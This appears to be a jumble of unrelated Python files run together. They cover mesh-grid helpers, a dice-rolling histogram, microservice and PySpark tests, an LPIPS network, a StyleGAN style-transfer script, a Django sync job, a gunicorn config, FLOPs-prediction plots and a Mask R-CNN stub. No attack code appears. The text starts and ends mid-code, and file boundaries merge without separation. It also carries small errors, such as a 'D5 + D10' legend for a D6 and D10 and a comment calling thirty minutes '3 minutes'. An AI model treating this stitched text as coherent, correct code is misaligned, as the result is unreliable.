coordinates_to_numpy_matrix(*args): args = args_as_numpy_arrays(*args) assert_arrays_are_equal_size(*args) coords = np.empty((len(args), len(args[0])), dtype=float) for (dim, arg) in enumerate(args): coords[dim][:] = arg.flatten() return coords def non_singleton_axes(grid): try: shape = grid.get_shape() except AttributeError: return np.arange(grid.get_dim_count()) else: (indices,) = np.where(shape > 1) return indices def non_singleton_shape(grid): shape = grid.get_shape() (indices,) = np.where(shape > 1) return shape[indices] def non_singleton_coordinate_names(grid): indices = non_singleton_axes(grid) return grid.get_coordinate_name(indices) def non_singleton_dimension_names(grid): if is_structured(grid, strict=False): coordinate_names = non_singleton_coordinate_names(grid) # return np.array(['n' + name for name in coordinate_names]) return coordinate_names else: return np.array(["n_node"]) def non_singleton_dimension_shape(grid): if is_rectilinear(grid, strict=False): shape = non_singleton_dimension_names(grid) return shape[:, np.newaxis] elif is_structured(grid, strict=True): shape = non_singleton_dimension_names(grid) return np.tile(shape, (len(shape), 1)) elif is_unstructured(grid, strict=True): shape = np.array(["n_node"]) return np.tile(shape, (grid.get_dim_count(), 1)) def _find_first(array, value): try: return np.where(array == value)[0][0] except IndexError: return len(array) def connectivity_matrix_as_array(face_nodes, bad_val): nodes_per_face = np.empty(face_nodes.shape[0], dtype=int) for (face_id, face) in enumerate(face_nodes): nnodes = _find_first(face, bad_val) if nnodes > 0: nodes_per_face[face_id] = _find_first(face, bad_val) else: raise ValueError("face contains no nodes") offsets = np.cumsum(nodes_per_face) connectivity = np.empty(offsets[-1], dtype=int) offset = 0 for (n_nodes, face) in zip(nodes_per_face, face_nodes): connectivity[offset : offset + n_nodes] = face[:n_nodes] offset += n_nodes return (connectivity, offsets)
Rolling Dice/different_dice.py
import pygal from die import Die # Create a D6 and D10 die_1 = Die() die_2 = Die(10) # Make some rolls, and store the results in a list results = [] for roll_num in range(50000): result = die_1.roll() + die_2.roll() results.append(result) # Analyze the results frequencies = [] max_result = die_1.num_sides + die_2.num_sides for value in range(2, max_result+1): frequency = results.count(value) frequencies.append(frequency) # Visualize the results. 
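# A minimal sketch of the same frequency tally using collections.Counter: it
# counts all 50,000 rolls in one pass instead of calling results.count(value)
# once per possible total. It assumes the `results`, `max_result`, and
# `frequencies` names built just above; the pygal chart that follows consumes
# the same `frequencies` list either way.
from collections import Counter

roll_counts = Counter(results)
frequencies_fast = [roll_counts[value] for value in range(2, max_result + 1)]
assert frequencies_fast == frequencies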
hist = pygal.Bar() hist.title = "Results of rolling a D6 and a D10 50,000 times" hist.x_labels = [str(value) for value in range(2, 17)] hist.x_title = "Result" hist.y_title = "Frequency of Result" hist.add('D5 + D10', frequencies) hist.render_to_file('different_dice.svg') microservice/tests/microservices_for_testing.py import sys from microservice.core.decorator import microservice echo_as_dict2_args = (5, 2, 5) echo_as_dict2_kwargs = {'asdf': "asdrf"} @microservice def echo_as_dict(*args, **kwargs): ret = {'_args': args} ret.update(kwargs) return ret @microservice def echo_as_dict2(*args, **kwargs): ret = {'_args': args} ret.update(kwargs) print("Calling into `echo_as_dict`") ret2 = echo_as_dict(*echo_as_dict2_args, **echo_as_dict2_kwargs) return ret, ret2 @microservice def echo_as_dict3(*args, **kwargs): ret = {'_args': args} ret.update(kwargs) ret2 = echo_as_dict2(234, 456, 345, ty="no problem") return ret, ret2 @microservice def echo_as_dict4(*args, **kwargs): ret = {'_args': args} ret.update(kwargs) ret2 = echo_as_dict3(234, 456, 345, ty="no problem") return ret, ret2 @microservice def echo_as_dict5(*args, **kwargs): ret = {'_args': args} ret.update(kwargs) ret2 = echo_as_dict2(234, 456, 345, ty="no problem") ret3 = echo_as_dict3(234, 456, 345, ty="no problem") return ret, ret2, ret3 @microservice def exception_raiser(*args, **kwargs): raise RuntimeError("Called with: {}; {}".format(args, kwargs)) all_test_microservices = [ 'microservice.tests.microservices_for_testing.echo_as_dict', 'microservice.tests.microservices_for_testing.echo_as_dict2', 'microservice.tests.microservices_for_testing.echo_as_dict3', 'microservice.tests.microservices_for_testing.echo_as_dict4', 'microservice.tests.microservices_for_testing.echo_as_dict5', 'microservice.tests.microservices_for_testing.exception_raiser', ] jabba/file_data.py import collections FileData = collections.namedtuple('FileData', ['path', 'yaml']) marcoalsina/araucaria1-10 #!/usr/bin/python # -*- coding: utf-8 -*- """ The :mod:`~araucaria.xas` module contains the main functions to manipulate XAFS spectra. The following submodules are currently implemented: - The :mod:`~araucaria.xas.merge` module contains functions to pre-process and merge spectra. - The :mod:`~araucaria.xas.deglitch` module contains an algorithm to automatically deglitch a spectrum. - The :mod:`~araucaria.xas.normalize` module contains functions to normalize a spectrum. - The :mod:`~araucaria.xas.autobk` module contains the Autobk algorithm for background removal of a spectrum. - The :mod:`~araucaria.xas.xasft` module contains functions to perform Fourier transforms on a spectrum. - The :mod:`~araucaria.xas.xasutils` module contains utility functions to assist manipulation of spectra. 
""" from .merge import calibrate, align, merge from .deglitch import deglitch from .normalize import find_e0, guess_edge, pre_edge from .autobk import autobk from .xasft import ftwindow, xftf, xftr, xftf_kwin, xftr_kwin from .xasutils import etok, ktoe, get_mapped_data from api.serializers.feed import CommentSerializer, ReplySerializer from api.serializers.users import UserSerializer from rest_framework import fields from rest_framework.serializers import Serializer from likes.models import Like class LikeSerializer(Serializer): user = UserSerializer() conversation = CommentSerializer() Nollde/order # coding: utf-8 __all__ = ["ProcessTest"] from io import BytesIO import unittest from order import Process from scinum import Number class ProcessTest(unittest.TestCase): def test_constructor(self): p = Process("ttH", 1, xsecs={ 13: Number(0.5071, {"scale": (Number.REL, 0.036)}), }, label=r"$t\bar{t}H$", color=(255, 0, 0), ) self.assertEqual(p.get_xsec(13).n, 0.5071) self.assertEqual(p.label_root, "t#bar{t}H") with self.assertRaises(TypeError): Process("ttH_bb", 2, xsecs="nodict") with self.assertRaises(TypeError): Process("ttH_cc", 3, xsecs={13: ""}) def test_child_processes(self): p = Process("tt", 4) p5 = p.add_process("tt_bb", 5) self.assertEqual(p.get_process(5), p5) self.assertEqual(p5.get_parent_process(4), p) def test_attributes(self): p = Process("ST", 6, xsecs={13: 5}) self.assertEqual(p.get_xsec(13).n, 5.) p.set_xsec(13, 6) self.assertEqual(p.get_xsec(13).n, 6.) p.xsecs = {14: 7} self.assertNotIn(13, p.xsecs) self.assertEqual(p.get_xsec(14).n, 7.) def test_copy(self): p = Process("ttVV", 7, xsecs={13: 5}, color=(0.3, 0.4, 0.5), is_data=False, aux={1: 2}) p2 = p.copy(name="ttVVV", id=8, aux={3: 4}) self.assertEqual(p2.name, "ttVVV") self.assertEqual(p2.id, 8) self.assertEqual(p2.get_xsec(13), 5) self.assertEqual(p2.color, p.color) self.assertEqual(list(p2.aux.keys())[0], 3) def test_parent_processes(self): c = Process("child", 10) p1 = Process("parent1", 11) p1.add_process(c) self.assertIn(p1, c.parent_processes) p2 = Process("parent2", 12, processes=[c]) self.assertIn(p2, c.parent_processes) def test_pretty_print(self): a = Process("a", 100, xsecs={13: 12}) a.add_process("b", 101, xsecs={13: 1}) output = BytesIO() a.pretty_print(13, offset=10, stream=output) self.assertEqual(output.getvalue().decode("utf-8"), "> a (100) 12.0 (no uncertainties)\n| > b (101) 1.0 (no uncertainties)\n") """ Code adapted from https://github.com/richzhang/PerceptualSimilarity Original License: Copyright (c) 2018, , , , , All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ import torch from torch import nn import torchvision class LPIPS_VGG16(nn.Module): _FEATURE_IDX = [0, 4, 9, 16, 23, 30] _LINEAR_WEIGHTS_URL = 'https://github.com/richzhang/PerceptualSimilarity' + \ '/blob/master/models/weights/v0.1/vgg.pth?raw=true' def __init__(self, pixel_min=-1, pixel_max=1): super(LPIPS_VGG16, self).__init__() features = torchvision.models.vgg16(pretrained=True).features self.slices = nn.ModuleList() linear_weights = torch.utils.model_zoo.load_url(self._LINEAR_WEIGHTS_URL) for i in range(1, len(self._FEATURE_IDX)): idx_range = range(self._FEATURE_IDX[i - 1], self._FEATURE_IDX[i]) self.slices.append(nn.Sequential(*[features[j] for j in idx_range])) self.linear_layers = nn.ModuleList() for weight in torch.utils.model_zoo.load_url(self._LINEAR_WEIGHTS_URL).values(): weight = weight.view(1, -1) linear = nn.Linear(weight.size(1), 1, bias=False) linear.weight.data.copy_(weight) self.linear_layers.append(linear) self.register_buffer('shift', torch.Tensor([-.030, -.088, -.188]).view(1, -1, 1, 1)) self.register_buffer('scale', torch.Tensor([.458, .448, .450]).view(1, -1, 1, 1)) self.pixel_min = pixel_min self.pixel_max = pixel_max self.requires_grad_(False) self.eval() def _scale(self, x): if self.pixel_min != -1 or self.pixel_max != 1: x = (2 * x - self.pixel_min - self.pixel_max) \ / (self.pixel_max - self.pixel_min) return (x - self.shift) / self.scale @staticmethod def _normalize_tensor(feature_maps, eps=1e-8): rnorm = torch.rsqrt(torch.sum(feature_maps ** 2, dim=1, keepdim=True) + eps) return feature_maps * rnorm def forward(self, x0, x1, eps=1e-8): x0, x1 = self._scale(x0), self._scale(x1) dist = 0 for slice, linear in zip(self.slices, self.linear_layers): x0, x1 = slice(x0), slice(x1) _x0, _x1 = self._normalize_tensor(x0, eps), self._normalize_tensor(x1, eps) dist += linear(torch.mean((_x0 - _x1) ** 2, dim=[-1, -2])) return dist.view(-1) from .config import set_config from .get import get from .login import login from .logout import logout from .next import next from .pause import pause from .play import play from .prev import prev from .set import set from .status import status from .volume import volume __all__ = [ "set_config", "get", "login", "logout", "next", "pause", "play", "prev", "set", "status", "volume", ] import torch torch.backends.cudnn.benchmark = True from torchvision import transforms, utils from util import * from PIL import Image import math import random import os import numpy as np from torch import nn, autograd, optim from torch.nn import functional as F from torchvision.utils import save_image from tqdm import tqdm import lpips import wandb from model import * from e4e_projection import projection as e4e_projection import subprocess from copy import deepcopy import argparse import glob os.makedirs('style_images', exist_ok=True) os.makedirs('style_images_aligned', exist_ok=True) os.makedirs('models', exist_ok=True) os.makedirs('test_output', exist_ok=True) os.makedirs('train_aligned', exist_ok=True) os.makedirs('train_inversion', 
exist_ok=True) os.makedirs('train_style_images', exist_ok=True) drive_ids = { "stylegan2-ffhq-config-f.pt": "1Yr7KuD959btpmcKGAUsbAk5rPjX2MytK", "e4e_ffhq_encode.pt": "1o6ijA3PkcewZvwJJ73dJ0fxhndn0nnh7", "restyle_psp_ffhq_encode.pt": "1nbxCIVw9H3YnQsoIPykNEFwWJnHVHlVd", "arcane_caitlyn.pt": "1gOsDTiTPcENiFOrhmkkxJcTURykW1dRc", "arcane_caitlyn_preserve_color.pt": "1cUTyjU-q98P75a8THCaO545RTwpVV-aH", "arcane_jinx_preserve_color.pt": "1jElwHxaYPod5Itdy18izJk49K1nl4ney", "arcane_jinx.pt": "1quQ8vPjYpUiXM4k1_KIwP4EccOefPpG_", "arcane_multi_preserve_color.pt": "1enJgrC08NpWpx2XGBmLt1laimjpGCyfl", "arcane_multi.pt": "15V9s09sgaw-zhKp116VHigf5FowAy43f", "disney.pt": "1zbE2upakFUAx8ximYnLofFwfT8MilqJA", "disney_preserve_color.pt": "1Bnh02DjfvN_Wm8c4JdOiNV4q9J7Z_tsi", "jojo.pt": "13cR2xjIBj8Ga5jMO7gtxzIJj2PDsBYK4", "jojo_preserve_color.pt": "1ZRwYLRytCEKi__eT2Zxv1IlV6BGVQ_K2", "jojo_yasuho.pt": "1grZT3Gz1DLzFoJchAmoj3LoM9ew9ROX_", "jojo_yasuho_preserve_color.pt": "1SKBu1h0iRNyeKBnya_3BBmLr4pkPeg_L", "supergirl.pt": "1L0y9IYgzLNzB-33xTpXpecsKU-t9DpVC", "supergirl_preserve_color.pt": "1VmKGuvThWHym7YuayXxjv0fSn32lfDpE", "art.pt": "1a0QDEHwXQ6hE_FcYEyNMuv5r5UnRQLKT", } # モデルダウンロード for key in drive_ids: file_id = drive_ids[key] dst_path = './models/' + key if not os.path.exists(dst_path): res = subprocess.call(['gdown', '--id', file_id, '-O', dst_path]) print('Model download completed') device = 'cuda' if torch.cuda.is_available() else 'cpu' latent_dim = 512 print('The device used for torch is', device) transform = transforms.Compose( [ transforms.Resize((1024, 1024)), transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)), ] ) def get_args(): parser = argparse.ArgumentParser() # スタイルの適用に利用する画像を指定 parser.add_argument("--img_path", type=str, default='./test_input/sample_input.jpg') # 事前学習済みモデルを選択(art, arcane_multi, supergirl, arcane_jinx, arcane_caitlyn, jojo_yasuho, jojo, disney) parser.add_argument("--pretrained", type=str, default='arcane_multi', help='please select art, arcane_multi, supergirl, arcane_jinx, arcane_caitlyn, jojo_yasuho, jojo, disney') # 事前学習済みモデル、及び、学習時にStyleの色を適用する場合はTrue parser.add_argument("--preserve_color", type=bool, default=True) # ランダムにサンプルにスタイルを適用。サンプルを指定 parser.add_argument("--n_sample", type=int, default=5) # seed parser.add_argument("--seed", type=int, default=1234) # 学習時に使用するstyleのディレクトリを指定 parser.add_argument("--img_dir", type=str, default='./train_style_images/') # 学習時のiteration parser.add_argument("--num_iter", type=int, default=200) args = parser.parse_args() return (args) def main(): # generatorのロード original_generator = Generator(1024, latent_dim, 8, 2).to(device) ckpt = torch.load('models/stylegan2-ffhq-config-f.pt', map_location=lambda storage, loc: storage) original_generator.load_state_dict(ckpt["g_ema"], strict=False) mean_latent = original_generator.mean_latent(10000) # finetune generatorのロード generator = deepcopy(original_generator) args = get_args() filepath = args.img_path name = strip_path_extension(filepath)+'.pt' # 顔部分をcrop aligned_face = align_face(filepath) my_w = e4e_projection(aligned_face, name, device).unsqueeze(0) aligned_face.save('./test_output/Aligned_face.jpg') # pretrain styleをロード pretrained = args.pretrained preserve_color = args.preserve_color if preserve_color: ckpt = f'{pretrained}_preserve_color.pt' else: ckpt = f'{pretrained}.pt' # モデルロード ckpt = torch.load(os.path.join('models', ckpt), map_location=lambda storage, loc: storage) generator.load_state_dict(ckpt["g"], strict=False) n_sample = args.n_sample seed = 
args.seed # Style適用 torch.manual_seed(seed) with torch.no_grad(): generator.eval() z = torch.randn(n_sample, latent_dim, device=device) original_sample = original_generator([z], truncation=0.7, truncation_latent=mean_latent) sample = generator([z], truncation=0.7, truncation_latent=mean_latent) original_my_sample = original_generator(my_w, input_is_latent=True) my_sample = generator(my_w, input_is_latent=True) # 生成結果保存 if pretrained == 'arcane_multi': style_path = f'style_images_aligned/arcane_jinx.png' else: style_path = f'style_images_aligned/{pretrained}.png' style_image = transform(Image.open(style_path)).unsqueeze(0).to(device) face = transform(aligned_face).unsqueeze(0).to(device) my_output = torch.cat([style_image, face, my_sample], 0) save_image( utils.make_grid(my_output, normalize=True, range=(-1, 1)), './test_output/sample_output.png' ) output = torch.cat([original_sample, sample], 0) save_image( utils.make_grid(output, normalize=True, range=(-1, 1), nrow=n_sample), './test_output/random_sample_output.png' ) ################################################################################### # train ################################################################################### folderpath = args.img_dir images = glob.glob( os.path.join(folderpath, '*.*') ) targets = [] latents = [] for image in images: style_path = image name = strip_path_extension(os.path.basename(image)) # crop and align the face style_aligned_path = os.path.join('train_aligned', os.path.basename(image)) if not os.path.exists(style_aligned_path): style_aligned = align_face(style_path) style_aligned.save(style_aligned_path) else: style_aligned = Image.open(style_aligned_path).convert('RGB') # GAN invert style_code_path = os.path.join('train_inversion', f'{name}.pt') if not os.path.exists(style_code_path): latent = e4e_projection(style_aligned, style_code_path, device) else: latent = torch.load(style_code_path)['latent'] targets.append(transform(style_aligned).to(device)) latents.append(latent.to(device)) targets = torch.stack(targets, 0) latents = torch.stack(latents, 0) target_im = utils.make_grid(targets, normalize=True, range=(-1, 1)) alpha = 1.0 #@param {type:"slider", min:0, max:1, step:0.1} alpha = 1-alpha preserve_color = args.preserve_color num_iter = args.num_iter lpips_fn = lpips.LPIPS(net='vgg').to(device) # reset generator del generator generator = deepcopy(original_generator) g_optim = optim.Adam(generator.parameters(), lr=2e-3, betas=(0, 0.99)) # Which layers to swap for generating a family of plausible real images -> fake image if preserve_color: id_swap = [7,9,11,15,16,17] else: id_swap = list(range(7, generator.n_latent)) for idx in tqdm(range(num_iter)): if preserve_color: random_alpha = 0 else: random_alpha = np.random.uniform(alpha, 1) mean_w = generator.get_latent(torch.randn([latents.size(0), latent_dim]).to(device)).unsqueeze(1).repeat(1, generator.n_latent, 1) in_latent = latents.clone() in_latent[:, id_swap] = alpha*latents[:, id_swap] + (1-alpha)*mean_w[:, id_swap] img = generator(in_latent, input_is_latent=True) loss = lpips_fn(F.interpolate(img, size=(256,256), mode='area'), F.interpolate(targets, size=(256,256), mode='area')).mean() g_optim.zero_grad() loss.backward() g_optim.step() torch.manual_seed(seed) with torch.no_grad(): generator.eval() z = torch.randn(n_sample, latent_dim, device=device) original_sample = original_generator([z], truncation=0.7, truncation_latent=mean_latent) sample = generator([z], truncation=0.7, truncation_latent=mean_latent) original_my_sample = 
original_generator(my_w, input_is_latent=True) my_sample = generator(my_w, input_is_latent=True) # display reference images style_images = [] for image in images: name = os.path.basename(image) #style_path = f'train_aligned/{strip_path_extension(name)}.png' style_path = os.path.join('train_aligned', name) style_image = transform(Image.open(style_path)) style_images.append(style_image) face = transform(aligned_face).to(device).unsqueeze(0) style_images = torch.stack(style_images, 0).to(device) save_image( utils.make_grid(style_images, normalize=True, range=(-1, 1)), './train_aligned/trained_references.png' ) my_output = torch.cat([face, my_sample], 0) save_image( utils.make_grid(my_output, normalize=True, range=(-1, 1)), './train_aligned/trained_sample.png' ) output = torch.cat([original_sample, sample], 0) save_image( utils.make_grid(output, normalize=True, range=(-1, 1), nrow=n_sample), './train_aligned/trained_random_sample.png' ) # python3 demo.py \ # --img_path ./test_input/sample_input.jpg \ # --pretrained jojo \ # --preserve_color True \ # --n_sample 5 \ # --seed 1234 \ # --img_dir ./style_images/ if __name__ == '__main__': main()kzailac/poem import os import django os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Poem.settings') django.setup() import requests import logging from Poem import settings from Poem.poem import models from Poem.tenants.models import Tenant from xml.etree import ElementTree from tenant_schemas.utils import schema_context, get_public_schema_name from configparser import ConfigParser logging.basicConfig(format='%(filename)s[%(process)s]: %(levelname)s %(message)s', level=logging.INFO) logger = logging.getLogger("POEM") def tenant_vo_url(tenant): config = ConfigParser() config.read(settings.CONFIG_FILE) return config.get('SYNC_' + tenant.upper(), 'vo') def main(): "Parses VO list provided by CIC portal" schemas = list(Tenant.objects.all().values_list('schema_name', flat=True)) schemas.remove(get_public_schema_name()) for schema in schemas: with schema_context(schema): tenant = Tenant.objects.get(schema_name=schema) try: ret = requests.get(tenant_vo_url(tenant.name), timeout=60).content except Exception as e: logger.error('%s: VO card - '+'%s' % (schema.upper(), e)) continue try: Root = ElementTree.XML(ret) idcards = Root.findall("IDCard") except Exception as e: logger.error('%s: Could not parse VO card - %s' % ( schema.upper(), e)) continue if len(idcards) > 0: vos = [] for vo_element in idcards: dict_vo_element = dict(vo_element.items()) if 'Name' not in dict_vo_element or 'Status' not in dict_vo_element: logger.warning("%s: vo card does not contain 'Name' " "and 'Status' attributes for %s" % (schema.upper(), vo_element)) else: if dict_vo_element['Status'].lower() == 'production' and dict_vo_element['Name'] != '': vos.append(dict_vo_element['Name']) else: logger.error("%s: Error synchronizing VO due to invalid VO " "card" % schema.upper()) continue voindb = set([vo.name for vo in models.VO.objects.all()]) svos = set([vo for vo in vos]) if voindb != svos: try: if len(svos.difference(voindb)) > 0: for vo in svos.difference(voindb): models.VO.objects.create(name=vo) logger.info( "%s: Added %d VO" % (schema.upper(), len(svos.difference(voindb))) ) if len(voindb.difference(svos)) > 0: for vo in voindb.difference(svos): models.VO.objects.filter(name=vo).delete() logger.info( "%s: Deleted %d VO" % (schema.upper(), len(voindb.difference(svos))) ) except Exception as e: logger.error( "%s: database operations failed - %s" % (schema.upper(), e) ) else: logger.info("%s: 
VO database is up to date" % schema.upper()) main() # file gunicorn.conf.py # coding=utf-8 # Reference: https://github.com/benoitc/gunicorn/blob/master/examples/example_config.py import os _ROOT = os.path.abspath(os.path.join( os.path.dirname(__file__), '..')) timeout = 30 * 60 # 3 minutes keepalive = 24 * 60 * 60 # 1 day capture_output = Trueimport unittest from datetime import datetime import pyspark.sql.types as T from atc.spark import Spark from atc.transformations import join_time_series_dataframes class TestFunctions(unittest.TestCase): def test_join_time_series_dataframes(self): spark = Spark.master("local[*]").get() df1Schema = T.StructType([ T.StructField("Id", T.LongType(), True), T.StructField("Name", T.StringType(), True), T.StructField("StartTimestamp", T.TimestampType(), True), T.StructField("EndTimestamp", T.TimestampType(), True), T.StructField("State", T.StringType(), True) ]) df1Data = [ (1, "TestName", datetime(year=2020, month=1, day=1, hour=0), datetime(year=2020, month=1, day=2, hour=0), "state1"), (1, "TestName", datetime(year=2020, month=1, day=2, hour=0), datetime(year=2020, month=1, day=3, hour=0), "state2"), (1, "TestName", datetime(year=2020, month=1, day=3, hour=0), datetime(year=2020, month=1, day=4, hour=0), "state1") ] df2Schema = T.StructType([ T.StructField("Id", T.LongType(), True), T.StructField("StartTimestamp", T.TimestampType(), True), T.StructField("EndTimestamp", T.TimestampType(), True), T.StructField("State", T.StringType(), True) ]) df2Data = [ (1, datetime(year=2020, month=1, day=1, hour=6), datetime(year=2020, month=1, day=1, hour=8), "state3"), (1, datetime(year=2020, month=1, day=1, hour=10), datetime(year=2020, month=1, day=1, hour=12), "state3"), (1, datetime(year=2020, month=1, day=1, hour=20), datetime(year=2020, month=1, day=2, hour=4), "state4"), (1, datetime(year=2020, month=1, day=2, hour=6), datetime(year=2020, month=1, day=2, hour=8), "state3"), (1, datetime(year=2020, month=1, day=2, hour=10), datetime(year=2020, month=1, day=2, hour=12), "state3"), ] dfExpectedData = [ (1, "TestName", datetime(year=2020, month=1, day=1, hour=0), datetime(year=2020, month=1, day=1, hour=6), "state1"), (1, "TestName", datetime(year=2020, month=1, day=1, hour=6), datetime(year=2020, month=1, day=1, hour=8), "state3"), (1, "TestName", datetime(year=2020, month=1, day=1, hour=8), datetime(year=2020, month=1, day=1, hour=10), "state1"), (1, "TestName", datetime(year=2020, month=1, day=1, hour=10), datetime(year=2020, month=1, day=1, hour=12), "state3"), (1, "TestName", datetime(year=2020, month=1, day=1, hour=12), datetime(year=2020, month=1, day=1, hour=20), "state1"), (1, "TestName", datetime(year=2020, month=1, day=1, hour=20), datetime(year=2020, month=1, day=2, hour=4), "state4"), (1, "TestName", datetime(year=2020, month=1, day=2, hour=4), datetime(year=2020, month=1, day=2, hour=6), "state2"), (1, "TestName", datetime(year=2020, month=1, day=2, hour=6), datetime(year=2020, month=1, day=2, hour=8), "state3"), (1, "TestName", datetime(year=2020, month=1, day=2, hour=8), datetime(year=2020, month=1, day=2, hour=10), "state2"), (1, "TestName", datetime(year=2020, month=1, day=2, hour=10), datetime(year=2020, month=1, day=2, hour=12), "state3"), (1, "TestName", datetime(year=2020, month=1, day=2, hour=12), datetime(year=2020, month=1, day=3, hour=0), "state2"), (1, "TestName", datetime(year=2020, month=1, day=3, hour=0), datetime(year=2020, month=1, day=4, hour=0), "state1") ] # Construct dataframes df1 = spark.createDataFrame(df1Data, df1Schema) df2 
= spark.createDataFrame(df2Data, df2Schema) dfExpected = spark.createDataFrame(dfExpectedData, df1Schema) dfReturn = join_time_series_dataframes( dfPrimary=df1, dfSecondary=df2, startTimeColumnName="StartTimestamp", endTimeColumnName="EndTimestamp", idColumns=["Id"], stateColumn="State", ) self.assertEqual( dfExpected.orderBy("StartTimestamp").collect(), dfReturn.orderBy("StartTimestamp").collect(), ) if __name__ == "__main__": unittest.main()
""" Adapted from Java code in the "Refactoring" book by . Replace temp with query Code snippet. Not runnable. """ def get_price(quantity, item_price): """Gets the total price of a purchase given the quantity and the item price""" base_price = quantity * item_price discount_factor = get_discount_factor(base_price) return base_price * discount_factor def get_discount_factor(base_price): """Gets the discount factor for a given base price""" return 0.95 if base_price > 1000 else 0.98
import numpy as np import matplotlib.pyplot as plt import pickle ############################## data_file = 'data.pickle' def data_load(): with open(data_file, 'rb') as f: return pickle.load(f) data = data_load() def print_plots_names(): for pl in data['plots']: print(pl['name']) def plot_plot(p,lines=None,predict=None, save_as=None): fig = plt.figure() ax = fig.add_subplot(111) if p['ylim']: plt.ylim(0, p['ylim']) if not(lines): lines = list(range(p["no_lines"])) for line in lines: vals = p['lines'][line] if p['axis']=='progressive': x_vals = np.sqrt(np.prod(vals[:,0:6],axis=1)/10000) else: x_vals = vals[:,p['axis']] y_vals = vals[:, 6] ax.plot(x_vals, y_vals) if predict: p_vals = predict(vals) ax.plot(x_vals, p_vals,"k--") for (xs,ys,s) in p['text']: plt.text(xs,ys,s) ax.set_xlabel(p['x_axis_name']) ax.set_ylabel('Milliseconds') if save_as: plt.savefig(save_as, bbox_inches='tight') plt.show() ################## alpha flops ###################### # The function mypredict computes the alpha-flops correction according to the formula given in the article # "Dissecting FLOPs along input dimensions for GreenAI cost estimations" accepted for presentation at # the 7th International Online & Onsite Conference on Machine Learning, Optimization, and Data Science – # October 4 – 8, 2021 – Grasmere, Lake District, England – UK # we distinguish only two cases for K, namely K=1 and K>1. # if K=1, beta is 0.02 and gamma is .99 # if K>1, then beta is 0.001 and gamma is .56 # These values have been obtained by regression over the dataset def beta_gamma(K): Kis1 = K == 1 beta = Kis1 * 0.02 + (1 - Kis1) * 0.001 gamma = Kis1 * .99 + (1 - Kis1) * .56 return beta,gamma final = 0.0375 def mypredict(vals,print_prediction=False): D = np.prod(vals[:,0:2],axis=1) K = np.prod(vals[:,4:6],axis=1) C = np.prod(vals[:,2:4],axis=1) beta,gamma = beta_gamma(K) FLOPS = C * K * D / 1000000 #logK = tf.math.log(K) + 1 logK = np.log(K) +1 x = beta * (D - logK) x = (logK + x) / D #x = tf.math.log(x) x = np.log(x) x = gamma * x #x = final * tf.math.exp(x) x = final * np.exp(x) Ypred = x * FLOPS if print_prediction: for i in range(0,Ypred.shape[0]): print("predicted = {}; actual = {}".format(Ypred[i],vals[i,6])) return(Ypred) ################################################################# # Actual plotting. 
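# The chain of assignments inside mypredict above reduces to the closed form
#     Ypred = final * ((logK + beta * (D - logK)) / D) ** gamma * FLOPS
# with logK = ln(K) + 1, FLOPS = C * K * D / 1e6, and (beta, gamma) taken from
# beta_gamma(K), because final * exp(gamma * log(u)) == final * u ** gamma for
# u > 0. A small self-check of that equivalence before the plots below; the
# two sample rows are made-up layer shapes (columns 0-5 are the size factors,
# column 6 would hold the measured time), not values from the article's dataset.
def mypredict_closed_form(vals):
    D = np.prod(vals[:, 0:2], axis=1)
    K = np.prod(vals[:, 4:6], axis=1)
    C = np.prod(vals[:, 2:4], axis=1)
    beta, gamma = beta_gamma(K)
    FLOPS = C * K * D / 1000000
    logK = np.log(K) + 1
    return final * ((logK + beta * (D - logK)) / D) ** gamma * FLOPS

_sample_vals = np.array([[224., 224., 3., 64., 3., 3., 0.],
                         [56., 56., 64., 64., 1., 1., 0.]])
assert np.allclose(mypredict_closed_form(_sample_vals), mypredict(_sample_vals))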
# Predictions are plotted with dashed lines plots = data["plots"] plot_plot(plots[0],predict=mypredict) #av,se_as="PLOTS/plot1") plot_plot(plots[1],predict=mypredict) #,save_as="PLOTS/plot2") plot_plot(plots[2],predict=mypredict) #,save_as="PLOTS/plot3") plot_plot(plots[3],predict=mypredict) #,save_as="PLOTS/plot4") #K=1 plot_plot(plots[4],predict=mypredict) #,save_as="PLOTS/plot5") plot_plot(plots[5],predict=mypredict) #,save_as="PLOTS/plot6_K1") #K=1 plot_plot(plots[6],predict=mypredict) #,save_as="PLOTS/plot11") plot_plot(plots[7],predict=mypredict) #,save_as="PLOTS/dense_vs_batch") #K = 1 from PyQt5.QtWidgets import QMainWindow, QApplication import cv2 import os import sys import json import datetime import numpy as np import skimage from mrcnn import visualize from mrcnn.visualize import display_instances ROOT_DIR = os.path.abspath("../../") sys.path.append(ROOT_DIR) from mrcnn.config import Config from mrcnn import model as modellib, utils COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR,"mask_rcnn_coco.h5") DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR,"logs") class ExWindow(QMainWindow): def __init__(self): super().__init__() self.init_ui() def init_ui(self): self.setGeometry(300,300,400,300) self.setWindowTitle('Pig GUI') self.show() class PigConfig(Config): # Give the configuration a recognizable name NAME = "pig" # We use a GPU with 12GB memory, which can fit two images. # Adjust down if you use a smaller GPU. GPU_COUNT = 1 IMAGES_PER_GPU = 2 # Number of classes (including background) NUM_CLASSES = 1 + 2 # Background + objects # Number of training steps per epoch STEPS_PER_EPOCH = 300 # Skip detections with < 90% 